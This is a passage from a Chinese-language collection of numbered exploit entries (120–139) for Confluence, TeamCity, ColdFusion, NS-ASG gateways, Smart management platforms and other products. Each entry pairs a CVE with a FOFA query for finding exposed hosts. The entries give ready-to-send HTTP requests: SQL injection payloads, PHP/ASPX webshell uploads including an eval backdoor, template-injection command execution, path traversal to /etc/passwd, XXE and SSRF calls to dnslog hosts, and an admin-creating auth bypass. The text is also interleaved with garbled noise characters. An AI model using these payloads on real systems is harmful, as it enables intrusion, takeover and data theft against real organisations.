Te: trailers" D, z9 E7 L7 a9 A1 o/ A3 g
Connection: close3 E7 y1 w$ v0 ^6 x
* X& b& J8 M( z( \
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
( w8 ~' h9 ~" C3 X0 e9 r+ S- y3 A* O
7 ^; F# K$ {- t6 ~6 a
* e4 s5 t0 w% W( p120. 北京百绰智能S40管理平台导入web.php任意文件上传. S6 L/ n/ H/ }7 r- ~
CVE-2024-1253; J8 }7 O, L$ f' o7 y2 l
FOFA:title="Smart管理平台"
. K0 }7 J& O! P. IPOST /useratte/web.php? HTTP/1.1; R# N4 n6 v% d4 x9 |
Host: ip:port* y9 f9 \9 m* |; t
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db0 M& a$ l+ n* N" Z- H0 { P0 F
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko9 ?# Q* U2 z$ B4 M0 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. Z/ k( P7 u9 k" T8 ~7 EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, L7 C) f! u: X" A! o, {! cAccept-Encoding: gzip, deflate
$ g( G/ G$ c) l+ p6 D% NContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
2 P/ N9 W; s6 ZContent-Length: 597
0 X; P( ~2 f+ H4 J% SOrigin: https://ip:port
7 ~; s9 J, L7 s7 u3 v* pReferer: https://ip:port/sysmanage/licence.php+ c* J& H$ L3 q9 W5 f k# _; M8 I
Upgrade-Insecure-Requests: 1
$ r- J+ k/ ]5 N4 O; O$ i- Q. Z mSec-Fetch-Dest: document: R z7 j" b `( k
Sec-Fetch-Mode: navigate
- l0 ^( f2 ]8 Q/ SSec-Fetch-Site: same-origin
@9 ^5 L$ {: _' S4 d7 x* {& OSec-Fetch-User: ?1
1 E2 m9 V$ S, j0 Z: Q. [6 zTe: trailers# ?9 @- n F, `; r' W
Connection: close
9 W& m8 z1 e& P8 |' B+ c' M$ d( \) e' E" i) s2 c$ q% L- E a
-----------------------------42328904123665875270630079328
3 r: |8 T& R+ P% W9 r# MContent-Disposition: form-data; name="file_upload"; filename="2.php"0 \# j9 v! B7 i* z8 }
Content-Type: application/octet-stream. r7 g# M# @8 K6 R
' L ]6 E* s0 V) N<?php phpinfo()?>
2 R% P. @ J6 V! I& P7 X-----------------------------42328904123665875270630079328& C2 L4 m* Z5 e s. K
Content-Disposition: form-data; name="id_type"! \/ A* a1 M2 k% W ?- j
$ K2 ?& m5 d$ c3 ?3 Y1 u1
3 l9 _* y7 r( t' x-----------------------------423289041236658752706300793281 `( U" b8 A. ?
Content-Disposition: form-data; name="1_ck"# L1 L; w/ G( q% T) w* f; ~
! U; T0 j B6 \" F4 W! y1_radhttp
- q4 \+ n1 \ _( E% ~: r" j-----------------------------42328904123665875270630079328
5 r8 @5 \& Y- qContent-Disposition: form-data; name="mode"
1 `; ]# k# e9 S3 [4 h; N( E# `$ P- k; g" A/ Z e, h" s: w
import' [/ E% F0 S$ L# _
-----------------------------42328904123665875270630079328" G6 d8 j E m3 ~4 i
4 z/ {0 h0 J$ J: q+ N( _7 m3 T7 c5 c* x, a2 \* G# k
文件路径/upload/2.php
9 @6 O z/ T. O7 }8 q- Y2 r1 q6 p$ w$ {( o: l+ ]
121. 北京百绰智能S42管理平台userattestation.php任意文件上传: E7 Y' m/ k+ Y3 s# @& Z) Z U) G
CVE-2024-1918
" @ z }/ k' d6 B" o' xFOFA:title="Smart管理平台"
. a- t2 M( a$ wPOST /useratte/userattestation.php HTTP/1.1
; P) B3 G, S! w* u. gHost: 192.168.40.130:8443
' n! G& s1 o4 D; \( i0 O' T5 {$ s$ ~Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
( _0 L0 G" q# K3 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
5 w S; o$ l j# P: V+ ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. y; \- w4 \8 ~2 w0 VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- D2 {( g: C% i! T' G( d' _Accept-Encoding: gzip, deflate
. l/ h4 f( H8 p% I! n5 I" R: ?% I$ C) CContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793280 O) M# F$ {8 Z! t
Content-Length: 592
3 M* Y% u+ S. VOrigin: https://192.168.40.130:84431 H, R% I1 t( u& t/ V6 r; C% @
Upgrade-Insecure-Requests: 1
4 `! R) t* Z5 {9 b9 U6 \# w0 RSec-Fetch-Dest: document
+ w/ Z& i" a& R* D1 Q& b3 i( s0 FSec-Fetch-Mode: navigate
$ i7 F+ F4 k& \& d' {Sec-Fetch-Site: same-origin* `) z; F7 r g5 D" m5 X
Sec-Fetch-User: ?1
: }1 ^: K& C( _/ y% p8 ^Te: trailers$ Q5 H6 F6 U; K! B% T7 X
Connection: close1 u9 e' I& l, ?4 A& c
1 A4 l" l" x7 U
-----------------------------42328904123665875270630079328& Z2 b4 j" B* W6 n' U+ A. g+ a- I( W
Content-Disposition: form-data; name="web_img"; filename="1.php"
+ l% h& w3 u' u7 v v" }Content-Type: application/octet-stream' }9 }& O ~; v* }) g
* ]3 p# R- n& ]4 K2 p( {<?php phpinfo();?>/ j( t5 z% E \& b4 A
-----------------------------423289041236658752706300793285 B0 ~8 w! a& o/ H/ e' f
Content-Disposition: form-data; name="id_type"( e0 f- c( f0 U. U& l
& B+ _2 I5 b% W/ E( _1
7 Q# ]+ G$ w" x$ h. o-----------------------------42328904123665875270630079328
a/ o: ^- ]3 ^6 vContent-Disposition: form-data; name="1_ck") n) x' a6 G4 r/ Z& @' K: w
6 P) @# J* _# G: k S" b, B* U3 a1_radhttp. u' J, Q X5 j8 g; A& s
-----------------------------42328904123665875270630079328
5 G N, Y8 d% i% @Content-Disposition: form-data; name="hidwel"
! y) }; f7 U0 Y; l
+ g" g5 B, n N/ g4 x" w1 vset
. r4 ^& u$ V! E* ]+ k E9 ?-----------------------------42328904123665875270630079328- J1 B% t1 t- Q- v
! z3 U5 ? b3 |) I2 P N* i7 y, u$ | u6 K+ `
boot/web/upload/weblogo/1.php% U9 M$ c/ C0 W0 }- k+ e
; J$ [) G. [: [8 B
122. 北京百绰智能s200管理平台/importexport.php sql注入
! g9 h, i4 k$ C/ S4 W* b4 A* MCVE-2024-27718FOFA:title="Smart管理平台"
q! b, J* ^- d* S, @' X其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()0 L" j( C* o! k6 x
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1; t1 H/ ]- S+ ?* w
Host: x.x.x.x/ h ?' h: c& A( l
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
w8 f0 R6 O2 r2 o" B- w( vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
0 x( w7 [/ P7 m* d( JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& Q5 a1 R A) Z5 `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. f# F6 A- y3 |) \Accept-Encoding: gzip, deflate, br
6 V& p5 ?6 T+ t2 w0 Z( MUpgrade-Insecure-Requests: 19 a2 c1 w6 _/ [* U7 V5 E
Sec-Fetch-Dest: document3 r4 ]3 A p8 X0 e+ ~5 ~) s- C
Sec-Fetch-Mode: navigate
2 Z$ J6 e, S* w; U6 b1 [9 D3 _4 s) pSec-Fetch-Site: none! S1 R" [7 {- x h/ }2 f, O
Sec-Fetch-User: ?1! \7 x" N {: y% M7 x- ]" u' |
Te: trailers# r! n6 e/ W4 n2 }- h- [
Connection: close
4 }7 X0 J! J4 S5 G/ S6 u* {4 k
3 t- x- y& |5 ~8 M U) A4 B& A4 h' e) g
123. Atlassian Confluence 模板注入代码执行- F, T1 [& \3 `2 M5 K1 {8 D$ g1 j
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"/ U* l- S9 `+ z4 `
POST /template/aui/text-inline.vm HTTP/1.1* S" A) d" V, f; E o' `- c' n& q
Host: localhost:8090$ n) }6 `. r! s
Accept-Encoding: gzip, deflate, br. w' B4 I8 U7 f% \4 T4 w: V( p
Accept: */*
% }' }! F/ ?* W: g- v5 wAccept-Language: en-US;q=0.9,en;q=0.8
6 ~# @0 v: ?/ G4 r; b6 {) Q, [% SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36( n2 x; ~0 V1 q
Connection: close$ T$ p Y4 G* [ V, [
Content-Type: application/x-www-form-urlencoded
: i; d* f* A( D# o- k" C& P
/ z. j' R1 R' Elabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))0 i! }" i. E7 I5 \1 ]
$ X8 M) X( X) q3 O$ b
( |- Y, s$ x: ]$ T( [+ F2 ^124. 湖南建研工程质量检测系统任意文件上传5 f( S9 o" N% q y8 Y/ s
FOFA:body="/Content/Theme/Standard/webSite/login.css"
' A) s3 P7 }- q' v& d+ T7 N* zPOST /Scripts/admintool?type=updatefile HTTP/1.15 Q' e' E- G) t
Host: 192.168.40.130:8282
# F* Z/ ~7 l& _' `* g/ RUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 {& w: G( n* f& E) ~
Content-Length: 72
. N2 q& M9 P; r! i- z0 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8, L8 b5 D v. g5 A2 w* ^' M) z
Accept-Encoding: gzip, deflate, br
1 F3 [% R! l+ H B/ p0 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" r6 ]. p2 f" I# |
Connection: close
2 h( r( ~. Z$ R5 JContent-Type: application/x-www-form-urlencoded/ T# `2 ^2 O0 J6 K7 C
h$ ]9 R( o" l/ P# q
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>0 ^! _# e2 D3 I/ e8 L7 w/ [! R; j
9 A3 j# ~( n( u* ~7 o& }% e
4 b0 b" Y0 w# `
http://192.168.40.130:8282/Scripts/abcgcg.aspx9 ~& k1 V* K# X! b3 \1 ~
4 t6 x/ \* P% z Q. t
125. ConnectWise ScreenConnect身份验证绕过6 N* y( n- P# z0 C& {
CVE-2024-17097 H( h4 B J8 X- ]+ k: n
FOFA:icon_hash="-82958153"
# j% ?+ c3 c, B6 ^; fhttps://github.com/watchtowrlabs ... bypass-add-user-poc
3 {) o2 Q0 m. u7 D+ i' U% q( b! m/ `5 O0 ?9 P* K
5 X; p1 i. H2 E7 U2 R1 |6 J' ~使用方法
. \* d! V* z* e, M$ Upython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!9 t" {8 y X# F) h3 q1 P7 F# j
# v! x* ?( N3 u+ h) i8 k
. L. x* h$ c2 y1 O创建好用户后直接登录后台,可以执行系统命令。1 j9 C d2 n; |% F+ ~0 R
, ?; P9 T+ ]8 w! B126. Aiohttp 路径遍历
{) i* E( i; G D/ n) v6 C) M4 LFOFA:title=="ComfyUI"
! {, [0 D8 t/ t, aGET /static/../../../../../etc/passwd HTTP/1.1
5 _3 X" ~+ [, q& c( ~3 u; MHost: x.x.x.x8 x6 \8 u' D* z$ _( x; A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36, i: E0 p* Z4 p1 P
Connection: close
5 }" H; E9 n6 R& w9 y1 |2 rAccept: */*
/ S: r$ F# M& I+ EAccept-Language: en
7 x- e9 v% u8 L8 C8 D2 UAccept-Encoding: gzip
" ?4 b3 L- `+ D1 i
) }. j& j1 W0 D7 m E y3 D4 g" C- m6 \' s9 L5 s0 [
127. 广联达Linkworks DataExchange.ashx XXE
7 n6 C2 W' u+ g' ?1 P: r3 FFOFA:body="Services/Identification/login.ashx"
/ ^: d9 X2 _; {$ h$ pPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1) c' n! q& i$ u; q/ b* o4 i
Host: 192.168.40.130:8888* b; [. |0 J: `* r9 n6 }+ B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.366 q- A. j7 h/ d7 t% ~3 ?
Content-Length: 415& B/ q6 \ `: n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* O& e- S0 ~: J5 FAccept-Encoding: gzip, deflate- t- i5 n0 S% m
Accept-Language: zh-CN,zh;q=0.9
2 @# u+ [# v7 v4 ~" J8 DConnection: close
6 I9 p: v z, t3 I0 B! uContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
6 N" {, u" K' o/ y0 S! y$ GPurpose: prefetch
: `: m0 E! z8 M( FSec-Purpose: prefetch;prerender
3 z2 }- W: m% d$ L h. [
. [3 D+ [: A; I$ W! w/ N------WebKitFormBoundaryJGgV5l5ta05yAIe03 _9 J9 E2 P& H/ m8 \" k
Content-Disposition: form-data;name="SystemName"
3 b/ S; k$ U% h- {5 Y. O
, Y/ y; u9 B4 g* i- Z" x5 R* ZBIM
) q1 j% a% ^9 C$ d. r" P------WebKitFormBoundaryJGgV5l5ta05yAIe0
( L; Z- z7 A5 a! QContent-Disposition: form-data;name="Params"
/ \- l- O2 p8 ?" t+ V- EContent-Type: text/plain
+ d" Y% [7 P; j6 a0 x9 u, I) O& A
4 j: S1 p- z7 u& m; u# S<?xml version="1.0" encoding="UTF-8"?>
6 `9 G$ U# v2 g+ V$ A& q<!DOCTYPE test [
; o( v3 t! V$ f<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">' w$ }- N8 W- ?4 k7 D3 b' {4 X
]
( c: }+ X0 R! J# s( C" ], U3 a>, f% a! x A! u2 b8 m# ~; y
<test>&t;</test>$ L2 O& f) N8 z, l
------WebKitFormBoundaryJGgV5l5ta05yAIe0--& }2 G' e& |6 k, |7 @5 }) j3 w
* y: V9 b1 D" Y7 N* O. |- H
* O9 r. l" P) Z3 u' j) d
- n- Q/ t. b7 `) Y' F
128. Adobe ColdFusion 反序列化; }8 F0 |3 `! u3 g5 L$ e. Z
CVE-2023-38203
: `7 Q$ M2 T4 Y5 y/ j" cAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
1 n) E! @: `( B* C3 u: ]/ fFOFA:app="Adobe-ColdFusion"
: u; q/ _$ g& gPAYLOAD3 z1 _ L- E6 Z% N7 x; F
8 W- \- C2 x7 {! t# \1 ~0 H129. Adobe ColdFusion 任意文件读取
2 W1 a8 G, ~ |+ [6 ECVE-2024-207673 c8 j/ r1 u6 R
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
3 M* `& l( ]: y' g% c5 Q第一步,获取uuid5 J7 W- K1 n; a' ?" b, s
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
* @! T! |+ B3 v1 B2 F5 T/ A3 ]Host: x.x.x.x
i) ~; V9 o; MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' A% M4 ~+ e8 y7 i4 eAccept: */*: E K2 c @9 s/ Y- ~0 X' g, `
Accept-Encoding: gzip, deflate
$ a7 |$ H( k/ p# n+ DConnection: close/ F, I2 F! K+ \
( K+ f* W- W( Y4 I( h- j0 C6 F0 V; d N8 P" h: G- p$ b
第二步,读取/etc/passwd文件 @* m) `, j; `
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
8 O1 W' a {! z9 r( `2 R/ a8 a+ F: _ GHost: x.x.x.x
! X7 S/ w; O$ g# |1 @* s0 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: m z% V8 G2 u. uAccept: */** K( h" r" z; j5 j, m5 [
Accept-Encoding: gzip, deflate+ M: x7 X- F8 V+ j' I
Connection: close
8 g4 O( T( w# F' P; x3 o6 Kuuid: 85f60018-a654-4410-a783-f81cbd5000b9$ l- Q. j4 ]3 h/ Q
- R3 i# P& L, j0 p( S1 L# @
$ `4 A; M& k m' g# p" x130. Laykefu客服系统任意文件上传5 Q0 I# a# i) }$ ]* W7 q+ t
FOFA:icon_hash="-334624619", e; y! I8 x' s' r$ p9 G
POST /admin/users/upavatar.html HTTP/1.19 t U2 K* t# \& ]; Z+ @/ b% d
Host: 127.0.0.1. S: n7 |7 A( b
Accept: application/json, text/javascript, */*; q=0.01' Q/ Q6 E3 [# T* \
X-Requested-With: XMLHttpRequest0 k8 a$ H) E9 ], D6 ]" j9 C2 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
7 N& a' v0 y; t' |* mContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR2 X" @8 i: `1 N+ r- e" N& V
Accept-Encoding: gzip, deflate: a7 A5 h0 v4 ]
Accept-Language: zh-CN,zh;q=0.94 Q/ L* e" N( X/ g9 |
Cookie: user_name=1; user_id=3 p: ~4 B4 G; \& r- ?5 F% v: B
Connection: close
' y# x5 |" K+ G& x) `& o5 _# c5 M. \8 o4 a
------WebKitFormBoundary3OCVBiwBVsNuB2kR& _( T. x% H# l
Content-Disposition: form-data; name="file"; filename="1.php"
( [- a" B* D: m# B! @Content-Type: image/png$ Q: t+ [$ r% J3 c" o' f
- j& Q" b5 H8 n) }- n5 M8 T- r) R& ~
<?php phpinfo();@eval($_POST['sec']);?>
, v- ^2 d l j& z* n; w2 ~, Z------WebKitFormBoundary3OCVBiwBVsNuB2kR--
2 ^! g* M3 {# H7 c
, O! I: j3 ?4 Q9 O$ k3 [3 n6 p+ E. a. {, V% t0 T& B! w7 A8 h
131. Mini-Tmall <=20231017 SQL注入; Q% ~2 S. o. ~
FOFA:icon_hash="-2087517259"% P, h+ X' f7 V& h7 G5 g- I A
后台地址:http://localhost:8080/tmall/admin7 p a4 \, @5 C1 G: s1 x/ z7 J
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)2 J) Z0 E1 r9 L7 ]' I: [( \; X3 W# K
4 D' y( l5 A5 t2 l+ h
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
+ g+ f0 W4 i) {3 p4 U7 _. ]* t5 GCVE-2024-27198! M- C+ v1 J+ j0 h, p+ I4 `+ f$ X
FOFA:body="Log in to TeamCity"0 K# ~* E/ O$ {& e" H r X3 j
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1- _9 ^4 m- b- Y" v% d f8 T! }* C6 `
Host: 192.168.40.130:8111
$ ]" V: H+ Q5 b4 X4 P) {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 j1 _/ `3 r; x' z3 p9 |8 rAccept: */*5 c; h4 R6 ^2 Y. g+ e2 t+ ]
Content-Type: application/json
+ a+ B& _3 c$ j! RAccept-Encoding: gzip, deflate* q7 j H: X2 r
1 O- J: S8 s* U$ x5 B0 [' F- v( q
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
6 R0 c( A# v# ]& o( k
2 M6 J( {6 q7 @1 O; d
( r4 h" v6 P$ Y( P) oCVE-2024-27199; Z; U5 T) v$ s+ } }7 _. @2 h
/res/../admin/diagnostic.jsp
. d& g0 ^+ B; y& x. c& }8 Y/.well-known/acme-challenge/../../admin/diagnostic.jsp
, x0 t* G( I+ G3 _/update/../admin/diagnostic.jsp. G6 S2 R' D# x3 i
C: n2 @ U7 u7 q* E% P5 H) c; H0 m% N! O0 t3 D8 H
CVE-2024-27198-RCE.py
; a; y1 z( X( N6 F, q* E. I' ^, u i/ @" w' W4 X& A C
133. H5 云商城 file.php 文件上传8 V: L7 `" s/ c; @. c& Y; e6 U3 F
FOFA:body="/public/qbsp.php"* Q6 O1 M: N' M7 i
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Q1 \' e( S6 ], d! o7 SHost: your-ip. w0 ~4 b1 y9 x+ m! B: ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) d" S9 { P% [ rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
7 X; p% S' u! v. y
2 g) a5 a7 |. A* q4 U8 ^------WebKitFormBoundaryFQqYtrIWb8iBxUCx; l6 l! }4 q4 M/ d2 c% E- `+ I
Content-Disposition: form-data; name="file"; filename="rce.php"
" g$ Q, O" {1 w4 ]& z1 `7 @) vContent-Type: application/octet-stream$ @ x c! L9 y; ^* m. |9 a U
' h8 [6 U1 m& g0 U, |<?php system("cat /etc/passwd");unlink(__FILE__);?>
1 S' j4 y& c9 {------WebKitFormBoundaryFQqYtrIWb8iBxUCx--2 F2 H& @2 }% ^- v; T; z' n9 X
6 h" b/ X9 A- i2 o, w
$ V2 q* G: K' H3 {1 r* e, p& R8 K) s J$ ]& y, Q9 Y1 h( T) e) T0 M
134. 网康NS-ASG应用安全网关index.php sql注入
6 ^# H& _, M" j5 k/ M- kCVE-2024-23302 @, [/ l1 y) A
Netentsec NS-ASG Application Security Gateway 6.3版本' _4 \7 r, E- e' [9 O! Q
FOFA:app="网康科技-NS-ASG安全网关"8 X( i: p. m; X( {4 d1 B
POST /protocol/index.php HTTP/1.1; v3 T0 T2 b8 ^7 @2 ^; k$ P
Host: x.x.x.x
3 I9 }; p5 ]& d( k: o: A/ hCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de) f+ T ?# M8 ?# w; ?' k* L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0: l& [7 T7 B- D* @7 o) F
Accept: */*
1 `2 f2 M8 X. m- \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ i3 g2 N; \* B7 l6 qAccept-Encoding: gzip, deflate4 H2 T- l5 R* R1 B; o! {# x* |
Sec-Fetch-Dest: empty
9 c/ e2 o' L0 \& f7 GSec-Fetch-Mode: cors
" i/ b" r6 \+ i* PSec-Fetch-Site: same-origin
0 |. f* _/ I( RTe: trailers" G1 N2 @3 P$ z6 n# e: C
Connection: close. _9 i4 r1 u( r4 F0 u0 h
Content-Type: application/x-www-form-urlencoded
3 S. Z* B9 b8 c$ sContent-Length: 263
! |2 @: R2 r5 \8 Z9 u& c8 T+ q! f' X& N$ b4 w5 {% O, V" L
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}8 s. w) H2 h- M/ ?- E# O
5 u' u) r, J# M$ G5 m/ z4 X* I! T9 g# s! M6 r6 i
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入* ?- W( N/ ^$ Z$ ^' n* L; { W
CVE-2024-2022
* P& l Y9 a. E- E% |Netentsec NS-ASG Application Security Gateway 6.3版本* {9 U( ?& @6 K5 G/ q9 }
FOFA:app="网康科技-NS-ASG安全网关"& `4 K6 D. D5 W
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
. Z# A. \/ k2 n3 ?7 VHost: x.x.x.x9 j! y8 \( k1 d* j7 M9 o6 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 y2 j4 {& X: HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 {% a1 W. }( M0 ?# hAccept-Encoding: gzip, deflate2 d: q) L, O; v/ S: u/ N
Accept-Language: zh-CN,zh;q=0.9( @) K, A; ^6 z" D6 @( f
Connection: close
7 k) ?( r# _; S. \& Y+ p% A: Q3 R; s, B: ~5 \7 \ u1 I: C* w: `
2 @/ l$ f2 c _8 c
136. NextChat cors SSRF% T% i+ ~4 P9 _
CVE-2023-49785. Q) p( l( M9 j5 w, l& `4 U
FOFA:title="NextChat"
; _2 X- ^& N- k0 }. d3 f2 ~GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
& B; ?/ \) y& a) A0 z) N. bHost: x.x.x.x:10000* Q$ }: _: J$ N' l* F- _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ }) f p6 \# ^3 n# a
Connection: close+ d$ D0 [3 h' X. f! j; T; b- v
Accept: */*
/ ?9 e+ V* J4 d" s BAccept-Language: en
; R9 V$ l+ o& J8 k$ ]Accept-Encoding: gzip* z+ L0 E/ b6 G. i3 ^6 B( f& w! @
8 l, I7 Z, W1 R: x, H
, s8 p8 d5 X4 X3 C* G137. 福建科立迅通信指挥调度平台down_file.php sql注入
; H; j& x1 i3 j& uCVE-2024-2620
* X5 G8 z& j5 o; I, m4 [9 l$ o' HFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
0 l) d( |$ U% A2 h9 [ ]6 bGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1, ~$ F$ k; a5 q7 ^, T+ O9 k/ H
Host: x.x.x.x
7 V( G t4 q! [8 ]5 d' g9 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
& [' u+ h4 y" `: q9 o8 y* |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 f6 \! |6 I DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& T# R. t$ j5 a& A& zAccept-Encoding: gzip, deflate, br
: `* d- g6 S" a! g# BConnection: close, y B7 t9 _# Z
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj9 H# H; z% ^! k9 o+ {) f; U
Upgrade-Insecure-Requests: 1
* O) h8 H1 J7 J: |
/ U0 V6 D- r- o5 J* K/ P. K4 E
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
( M, h* T% a( v4 WCVE-2024-2621
* i0 j8 o$ O8 `* ]FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"8 n* P0 Z# _( p( F
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1: A4 l4 s2 B7 J a$ y
Host: x.x.x.x
; O4 a2 `+ D+ G" fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# |% V( ~. n3 u% v/ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% E% i& _' k9 s/ x3 E9 {- E7 `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- a& K, G% P: t* V6 {6 O4 BAccept-Encoding: gzip, deflate, br7 T" n. _. W' @: `
Connection: close
0 s) u p9 J* y3 IUpgrade-Insecure-Requests: 1' @9 w/ Q" X' V8 t" U6 C# N. e
/ H' y# ^: p5 U! n" M% \# {
7 y+ Z* P3 F2 y% h% y4 D139. 福建科立讯通信指挥调度平台editemedia.php sql注入
- W1 D3 `* D3 aCVE-2024-26225 I. i4 D3 t4 x0 U. b
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"; a% Z! C4 I' `: q! Q9 R
